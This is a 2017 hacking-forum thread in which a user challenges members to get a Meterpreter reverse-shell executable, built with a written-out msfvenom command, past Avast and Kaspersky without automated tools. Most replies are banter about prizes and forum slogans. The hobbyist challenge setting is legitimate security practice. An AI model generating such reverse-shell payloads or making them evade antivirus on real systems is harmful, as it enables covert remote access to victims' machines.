
When in doubt...WPS!

Author Topic: Fooling antivirus  (Read 4856 times)

Offline ch3rn0byl

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 187
  • Internets: +1337/-0
  • Grumpy Old Man with Mounds of Salt
Fooling antivirus
« on: February 15, 2017, 05:16:29 PM »
Here's a challenge:

Code:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -f exe -a x86 --platform windows -o notavirus.exe

Challenge 1: Bypass Avast
Challenge 2: Bypass Kaspersky

Download links are in the names.

For the challenges, you should download the antivirus software. After doing so, fully update it to the latest definitions.

Rules:
  • Don't use any automatic tools such as veil, etc
  • Anything that automates the process for you, don't use it
  • See above

After you are done, PM the steps you took to do so, that way no cheaters will cheat :)

Note to self: to be a cheater, one must actually participate. Not just click here, read, then leave like most of you do
The quieter you become, the more you are unlikely to sound stupid.

Offline Amonsec

  • Top Hat Member
  • Prospect
  • ********
  • Posts: 49
  • Internets: +36/-0
  • 1336 working to become 1337
Re: Fooling antivirus
« Reply #1 on: February 16, 2017, 02:08:01 AM »
Challenge accepted!   :)
That can be fun.
"A computer is only as good as it's user" - R4V3N
OSCP (2017)

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1728
  • Internets: +96/-0
  • My password is **********
Re: Fooling antivirus
« Reply #2 on: February 16, 2017, 06:20:30 PM »
Let's up the anti shall we?
200 internets (forum likes/karma) for the 1st person who solves this challenge
100 internets for the 2nd
50 for the 3rd
25 for the 4th
10 for the 5th

Ohhh unless we can do medals or something... that would be fun. GBM or H4 think you could look into that and see if we could do something like that?
A computer is only as strong as its user! -R4v3n

Offline Gingerbread Man

  • *High Tech Low-life*
  • Administrator
  • Elite
  • *****
  • Posts: 935
  • Internets: +93/-0
Re: Fooling antivirus
« Reply #3 on: February 17, 2017, 08:21:14 AM »
YES!
I could also put up a pi zero

That is very generous of you Ch3rn...Thank you very much.

It is a little short notice for 'medals' Galaxy (you mean like challenge coins or enamel pins right?) but I bet we could cook up a few of the embroidered patches with the 'new' logo...



Gave away more than a few at Defcon and they were a hit...;)

Offline TAPE

  • Top Hat Member Moderator
  • Elite
  • ********
  • Posts: 1249
  • Internets: +193/-0
Re: Fooling antivirus
« Reply #4 on: February 17, 2017, 01:43:36 PM »
you and your dam shellcode dude...



Take all the advice you like and then tell everyone to **** off and do your own thing -- Gitsnik

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1728
  • Internets: +96/-0
  • My password is **********
Re: Fooling antivirus
« Reply #5 on: February 20, 2017, 07:40:58 PM »
YES!
I could also put up a pi zero

That is very generous of you Ch3rn...Thank you very much.

It is a little short notice for 'medals' Galaxy (you mean like challenge coins or enamel pins right?) but I bet we could cook up a few of the embroidered patches with the 'new' logo...

Gave away more than a few at Defcon and they were a hit...;)

I was actually talking about forum medals (I have seen different ones on different sites when I used to have a bit more time on my hands) rather than physical medals or patches. But hey, I am all for either way if you want to handle the production/shipping. Will send a pm. Though personally, that isn't MY favorite catch phrase  ;)
Man I wish I had more time!
A computer is only as strong as its user! -R4v3n

Offline Gingerbread Man

  • *High Tech Low-life*
  • Administrator
  • Elite
  • *****
  • Posts: 935
  • Internets: +93/-0
Re: Fooling antivirus
« Reply #6 on: February 21, 2017, 07:24:38 AM »
... Though personally, that isn't MY favorite catch phrase  ;) ...

Then you must REALLY hate the runner up: "Top-Hat-Sec: Monocles and Shit"...

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1728
  • Internets: +96/-0
  • My password is **********
Re: Fooling antivirus
« Reply #7 on: February 23, 2017, 05:56:33 AM »
... Though personally, that isn't MY favorite catch phrase  ;) ...

Then you must REALLY hate the runner up: "Top-Hat-Sec: Monocles and Shit"...

Hmmm... well I do like "Top-Hat-Sec: A Computer is Only As Strong As It's User"

« Last Edit: February 23, 2017, 05:59:19 AM by GalaxyNinja »
A computer is only as strong as its user! -R4v3n

Offline ch3rn0byl

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 187
  • Internets: +1337/-0
  • Grumpy Old Man with Mounds of Salt
Re: Fooling antivirus
« Reply #8 on: February 23, 2017, 09:33:52 AM »
... Though personally, that isn't MY favorite catch phrase  ;) ...

Then you must REALLY hate the runner up: "Top-Hat-Sec: Monocles and Shit"...

Hmmm... well I do like "Top-Hat-Sec: A Computer is Only As Strong As It's User"



Guys, I wouldn't plan on anything. So far, this post has 1146 views. That's 1,146 people that came here and saw the dreaded word "challenge". Then they saw the next couple words "no automation". That combination of words scares the shit out of people for whatever reason

The quieter you become, the more you are unlikely to sound stupid.

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1728
  • Internets: +96/-0
  • My password is **********
Re: Fooling antivirus
« Reply #9 on: February 23, 2017, 07:30:06 PM »

Guys, I wouldn't plan on anything. So far, this post has 1146 views. That's 1,146 people that came here and saw the dreaded word "challenge". Then they saw the next couple words "no automation". That combination of words scares the shit out of people for whatever reason


Well I still think it is a cool idea for future stuff even if people don't rise to this specific challenge.  We will see... maybe they are just working on it!
A computer is only as strong as its user! -R4v3n

Offline Gingerbread Man

  • *High Tech Low-life*
  • Administrator
  • Elite
  • *****
  • Posts: 935
  • Internets: +93/-0
Re: Fooling antivirus
« Reply #10 on: February 27, 2017, 10:08:23 AM »

... That combination of words scares the shit out of people for whatever reason


Well I still think it is a cool idea for future stuff even if people don't rise to this specific challenge.  We will see... maybe they are just working on it!

Perhaps we should have the 'challenges' organized like "Hackthissite" or "Overthewire"...Have the answers not publicly posted, but have the puzzles persistently (and prominently) featured on the main forum index...

Give the members some other metric besides the more general 'internets' to track their progress through the 'Challenge Board'...

That way we can generate some 'low hanging fruit' to help prime the pump...get folks some wins under their belt...

Just a thought...

And, no need to fret Galaxy...the *Official* slogan will ALWAYS be "A Computer is only as strong as its user" (no apostrophe...I swear...some of us  have been fighting about that little detail since the "1336" shirts were made ;) )

We just want to liven up the merch for those of us who are willing to walk on the wild side...;)

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1728
  • Internets: +96/-0
  • My password is **********
Re: Fooling antivirus
« Reply #11 on: February 28, 2017, 04:54:12 AM »
Perhaps we should have the 'challenges' organized like "Hackthissite" or "Overthewire"...Have the answers not publicly posted, but have the puzzles persistently (and prominently) featured on the main forum index...

Give the members some other metric besides the more general 'internets' to track their progress through the 'Challenge Board'...

That way we can generate some 'low hanging fruit' to help prime the pump...get folks some wins under their belt...

Just a thought...

And, no need to fret Galaxy...the *Official* slogan will ALWAYS be "A Computer is only as strong as its user" (no apostrophe...I swear...some of us  have been fighting about that little detail since the "1336" shirts were made ;) )

We just want to liven up the merch for those of us who are willing to walk on the wild side...;)

Sounds like a plan to me!

Hah, yeah, it is a plan for its.  ;)
And I'm a grammar police too. Guess that is what happens when I start running on 4 hrs sleep per night.

I wasn't trying to be rude or anything... just having a little fun with the drop the mic.  ;D
As long as R4v3n is cool with it, then I am cool with it (which he is). :)
A computer is only as strong as its user! -R4v3n